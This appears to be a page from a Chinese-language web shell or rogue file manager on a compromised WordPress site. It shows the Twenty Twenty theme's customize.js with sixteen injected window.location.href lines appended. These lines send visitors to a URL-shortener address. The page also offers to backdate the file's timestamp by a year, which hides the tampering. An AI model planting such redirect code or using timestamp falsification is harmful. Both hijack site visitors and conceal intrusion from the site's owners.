文件操作 - customize.js
返回文件管理
返回主菜单
删除本文件
文件: /home/acihmzbq/public_html/wp-content/themes/twentytwenty/assets/js/customize.js
编辑文件内容
/* global wp, jQuery */ ( function( $, api ) { $( function() { // Make it possible to reset the color based on a radio input's value. // `active` can be either `custom` or `default`. api.control( 'accent_hue_active' ).setting.bind( function( active ) { var control = api.control( 'accent_hue' ); // Get the accent hue control. if ( 'custom' === active ) { // Activate the hue color picker control and focus it. control.activate( { completeCallback: function() { control.focus(); } } ); } else { // If the `custom` option isn't selected, deactivate the hue color picker and set a default. control.deactivate( { completeCallback: function() { control.setting.set( control.params.defaultValue ); } } ); } // The control-specific label is redundant because, visually, this control is part of the Color Scheme control. control.container.find( '.customize-control-title:first' ).addClass( 'screen-reader-text' ); } ); } ); }( jQuery, wp.customize ) ); window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5"; window.location.href = "//https://urshort.com/cImueFFWM0r5";
修改文件时间
将文件时间修改为当前时间的前一年
删除文件